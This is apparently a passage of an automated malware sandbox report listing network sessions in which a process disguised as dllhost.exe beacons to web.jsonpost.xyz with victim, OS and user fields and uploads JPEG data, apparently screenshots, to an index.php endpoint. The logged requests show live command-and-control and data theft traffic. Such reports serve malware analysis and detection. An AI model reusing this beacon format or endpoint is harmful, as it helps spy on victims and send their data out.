                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:03.123600006 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:03.243066072 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                81192.168.2.44983472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:03.186316013 CET219OUTPOST / HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                82192.168.2.44984072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:04.576699972 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:04.576740980 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:04.576807022 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:04.576833963 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:04.697134018 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:04.697292089 CET7416OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:53:04.697307110 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:04.697412014 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:04.697565079 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:04.697578907 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:04.817473888 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                83192.168.2.44984172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:04.609155893 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                84192.168.2.44984372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:06.048749924 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----67f1dda3f58c30bca5812691cfd54a6e
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98283
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:06.048820972 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 36 37 66 31 64 64 61 33 66 35 38 63 33 30 62 63 61 35 38 31 32 36 39 31 63 66 64 35 34 61 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------67f1dda3f58c30bca5812691cfd54a6eContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:06.049031973 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:06.049060106 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:06.169092894 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:06.169177055 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:06.169203997 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:06.169290066 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:06.169393063 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:06.169485092 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:06.169508934 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                85192.168.2.44984472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:06.061616898 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                86192.168.2.44984972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:07.551235914 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                87192.168.2.44985072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:07.570525885 CET196OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----20803717bf274c582f30f80916c596d3
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 102801
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:07.570565939 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 32 30 38 30 33 37 31 37 62 66 32 37 34 63 35 38 32 66 33 30 66 38 30 39 31 36 63 35 39 36 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------20803717bf274c582f30f80916c596d3Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:07.570638895 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:07.570683956 CET1236OUTData Raw: 66 de 6a 5f e9 da 3d d5 a2 cb 35 cc 37 71 ea 1a 8a 32 95 cc b1 aa a0 50 7b e4 2b 3e 47 43 27 d6 99 67 0e 8f a3 5c e9 97 31 ea 50 dc 41 0e a3 04 dc c1 28 99 23 0e 18 97 1b 76 e4 00 73 b5 9b 27 a5 6a 84 50 72 14 02 7b e2 99 e4 44 4e 4c 69 ff 00 7c
                                                                                Data Ascii: fj_=57q2P{+>GC'g\1PA(#vs'jPr{DNLi|eK7S=[ia3e:j/&o{3[F,[oIr[<9{uXcIxc}O=+dGQL_?Y(+5y9^Z6TStO0~\>LZ
                                                                                Nov 29, 2024 01:53:07.690721989 CET1236OUTData Raw: c6 e3 de 93 14 e3 45 31 8d a2 97 a5 27 7a 43 13 1f 4a 4e d4 e3 c5 27 4a 06 27 7a 0f 3c f5 a2 8e 08 fe 74 0c 42 28 3e b4 13 9e 28 ed e9 40 08 47 e2 05 14 1e 3d e8 a0 61 8c 51 47 e3 46 4d 00 27 e6 69 3b f6 a5 39 cf 6a 39 a0 68 4a 4e b4 b8 e7 9a 4a
                                                                                Data Ascii: E1'zCJN'J'z<tB(>(@G=aQGFM'i;9j9hJNJC!cHG4cuQ)A@QQ'qGCh4ZJJ_Q:3uNRRGN(<M>%)(#XGj^?)QKE%((RR@EP0
                                                                                Nov 29, 2024 01:53:07.690905094 CET9888OUTData Raw: d9 23 62 ac 33 d0 8e 0d 6d 47 15 42 bb 6a 94 d4 ad d9 a7 f9 19 55 c3 57 a2 af 56 0e 37 ee 9a fc c6 52 52 d1 5b 98 09 45 2f e1 49 40 c2 8a 2b 57 c3 7e 17 be f1 47 da a6 8e f5 6c ad 60 93 ca 0d e5 79 85 d8 0c 9e 32 3a 64 7e 75 c7 8d c7 53 c2 45 4a
                                                                                Data Ascii: #b3mGBjUWV7RR[E/I@+W~Gl`y2:d~uSEJi#EE]^[-w~H?U_1]uCI.__/$zO?YQVOp$"| !A`ihNeW]Fm(&}v
                                                                                Nov 29, 2024 01:53:07.690994024 CET4944OUTData Raw: 46 3e 94 d3 12 9f ba df 9d 26 68 a5 a0 c4 31 b0 ed 9f a5 33 04 76 a9 77 91 4b bc 1f bc 33 45 82 ec 82 8c 54 fb 50 fb 53 4c 47 f8 48 34 59 8e e4 58 a3 14 e2 a4 75 14 de f4 8a 0a 4a 5a 28 01 28 c5 14 50 31 28 a5 34 94 00 9c 51 4b 48 68 18 94 52 d2
                                                                                Data Ascii: F>&h13vwK3ETPSLGH4YXuJZ((P1(4QKHhRSRPIKI@kgCI*i?oXb#hd_KH[u5X15*H5x]n)$nN0H!kfmV;kVb:7U(mc=nq[[/
                                                                                Nov 29, 2024 01:53:07.691092968 CET4944OUTData Raw: 7e eb 7e 74 c3 0b 0e d9 a5 a5 04 f6 34 58 69 b2 ac b0 24 9f 7d 41 c7 ad 47 f6 38 3f e7 98 ad 0d f9 e1 94 1a 42 91 b7 4c ad 4b a6 9e e8 b5 51 a2 87 d8 e0 ff 00 9e 62 8f b1 c1 ff 00 3c c7 e5 57 0c 0d fc 24 1a 8c ab 2f 50 6a 79 23 d8 bf 68 df 52 b7
                                                                                Data Ascii: ~~t4Xi$}AG8?BLKQb<W$/Pjy#hRbp1UJ9#|W~T}?*E>H<by(`rbP1V%(?p1UJ|>yw+?*>bH<}?*O<V(
                                                                                Nov 29, 2024 01:53:07.691294909 CET2472OUTData Raw: 6e 46 7d 2b a0 d5 6e 33 e2 1b eb 58 ee 34 b7 82 0b 96 44 86 d2 d7 ca 78 40 fe 17 3e 52 ee 3f 46 61 c5 61 df 68 b7 9a 83 5c 3c f7 88 1a 7b 65 b5 75 8e 25 44 11 2b ab 84 55 50 02 80 54 1f 94 0f d4 d6 a0 37 b3 ca d2 de b5 9c b3 33 ef 79 a2 b3 8a 29
                                                                                Data Ascii: nF}+n3X4Dx@>R?Faah\<{eu%D+UPT73y)Yo|.&5{<:*ygo#Kf@f t}fY+*&`76Cs[6sDz-BV6F/F022V2jNqXj0jn71]xQ
                                                                                Nov 29, 2024 01:53:07.810739040 CET2472OUTData Raw: 22 09 e7 da 76 29 e7 b9 aa a5 a9 25 1b 5f d8 d7 47 e1 ed 02 d2 7b 09 75 ad 6a 56 8b 4c 89 b6 2a 27 df 9d ff 00 ba 3d bf cf 18 af ce 31 58 8c 46 61 88 d7 5e cb b1 fb c6 4d 47 2f ca f2 c8 d5 a5 f0 b4 9b 97 56 fc fe 7d 3a 1c e6 ea 4d d5 d9 ff 00 c2
                                                                                Data Ascii: "v)%_G{ujVL*'=1XFa^MG/V}:MQ@;o$[t>mQ4JxSE<fQK{a+Tgrc 7+ ?+1G$G _]>8-R__k_["QKEz
                                                                                Nov 29, 2024 01:53:07.810903072 CET2472OUTData Raw: 29 0d 2d 14 c0 4a 28 a2 98 05 14 51 40 c2 8a 28 a0 02 8a 4a 5e f4 0c 28 34 51 40 09 45 29 a4 14 c0 28 a2 8a 00 29 29 68 a6 31 05 06 96 93 bd 30 0c 51 4b 45 00 25 1d e9 68 a0 42 51 4b 49 8f c2 81 a0 a2 8c 51 4c 04 a2 96 8c 66 90 ee 26 39 a3 14 b4
                                                                                Data Ascii: )-J(Q@(J^(4Q@E)())h10QKE%hBQKIQLf&9PbPHK1HS*iNv>!ZJM"hdtf)OWUaqUDX8&86(#4\w"+I?#4S)2RJJbIE!qb~Rcc


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                88192.168.2.44985672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:08.967962027 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                89192.168.2.44985772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:09.075057030 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:09.075125933 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:09.075186968 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
